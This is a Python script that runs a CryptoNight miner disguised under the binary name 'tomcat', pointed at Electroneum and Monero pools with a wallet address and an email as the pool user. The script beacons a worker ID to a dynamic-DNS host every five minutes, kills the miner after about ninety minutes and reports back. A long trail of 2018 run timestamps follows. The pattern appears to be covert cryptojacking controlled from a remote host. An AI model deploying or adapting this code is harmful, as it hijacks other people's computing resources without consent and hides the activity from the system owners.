import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:05.415549
#2018-02-17 16:49:06.780336
#2018-02-17 18:39:05.615968
#2018-02-17 20:27:06.326022
#2018-02-17 22:14:05.836531
#2018-02-17 23:58:01.418123
#2018-02-18 01:49:03.954862
#2018-02-18 03:36:06.648098
#2018-02-18 05:23:06.334852
#2018-02-18 07:16:01.831632
#2018-02-18 09:03:03.497652
#2018-02-18 10:50:08.959664
#2018-02-18 12:36:07.782925
#2018-02-18 14:22:04.291228
#2018-02-18 16:13:06.745382
#2018-02-18 18:01:06.229902
#2018-02-18 19:47:06.003646
#2018-02-18 21:33:01.315944
#2018-02-18 23:21:07.278036
#2018-02-19 01:08:05.159215
#2018-02-19 02:54:04.668657
#2018-02-19 04:41:02.148259
#2018-02-19 06:25:05.583374
#2018-02-19 08:14:01.802991
#2018-02-19 10:04:01.838436
#2018-02-19 11:52:09.646717
#2018-02-19 13:38:07.507991
#2018-02-19 15:27:02.149088
#2018-02-19 17:16:07.968252
#2018-02-19 19:05:10.919435
#2018-02-19 20:49:08.077936
#2018-02-19 22:36:07.956972
#2018-02-20 00:22:07.634511
#2018-02-20 02:10:06.722524
#2018-02-20 03:59:06.214597
#2018-02-20 05:43:07.341163
#2018-02-20 07:30:09.215991
#2018-02-20 09:15:09.183180
#2018-02-20 10:58:05.973785
#2018-02-20 12:45:08.276608
#2018-02-20 14:30:01.517664
#2018-02-20 16:14:05.078865
#2018-02-20 18:02:01.426522
#2018-02-20 19:52:07.749801
#2018-02-20 21:39:04.389998
#2018-02-20 23:22:02.192523
#2018-02-21 01:06:05.823628
#2018-02-21 02:53:05.639261
#2018-02-21 04:43:01.416650
#2018-02-21 06:32:01.275741
#2018-02-21 08:17:07.961151
#2018-02-21 10:03:07.174011
#2018-02-21 11:50:19.741235
#2018-02-21 13:43:08.082216
#2018-02-21 15:28:05.702176
#2018-02-21 17:19:05.221857
#2018-02-21 19:08:08.588065
#2018-02-21 21:13:08.383743
#2018-02-21 23:00:08.024171
#2018-02-22 00:49:05.232029
#2018-02-22 02:37:07.121539
#2018-02-22 04:22:05.429956
#2018-02-22 06:07:07.269047
#2018-02-22 07:52:03.532090
#2018-02-22 09:40:01.358730
#2018-02-22 11:25:08.674815
#2018-02-22 13:10:04.769534
#2018-02-22 14:58:05.200264
#2018-02-22 16:43:06.545394
#2018-02-22 18:31:04.099151
#2018-02-22 20:23:05.385160
#2018-02-22 22:09:05.473242
#2018-02-22 23:55:10.396332
#2018-02-23 01:43:07.719835
#2018-02-23 03:32:01.999462
#2018-02-23 05:17:01.971319
#2018-02-23 07:02:08.086268
#2018-02-23 08:52:02.905835
#2018-02-23 11:10:09.442666
#2018-02-23 13:03:06.599881
#2018-02-23 14:48:05.074423
#2018-02-23 16:36:09.681178
#2018-02-23 18:24:01.859906
#2018-02-23 20:09:07.622821
#2018-02-23 21:58:05.449924
#2018-02-23 23:46:01.376482
#2018-02-24 01:37:04.866802
#2018-02-24 03:26:01.272395
#2018-02-24 05:11:06.693672
#2018-02-24 06:59:05.829517
#2018-02-24 08:48:06.993823
#2018-02-24 10:48:07.183998
#2018-02-24 12:36:01.232256
#2018-02-24 14:24:01.623562
#2018-02-24 16:12:05.570704
#2018-02-24 18:04:03.800139
#2018-02-24 19:51:04.206685
#2018-02-24 21:35:04.288899
#2018-02-25 00:24:04.794312
#2018-02-25 03:30:06.793592
#2018-02-25 07:18:07.782761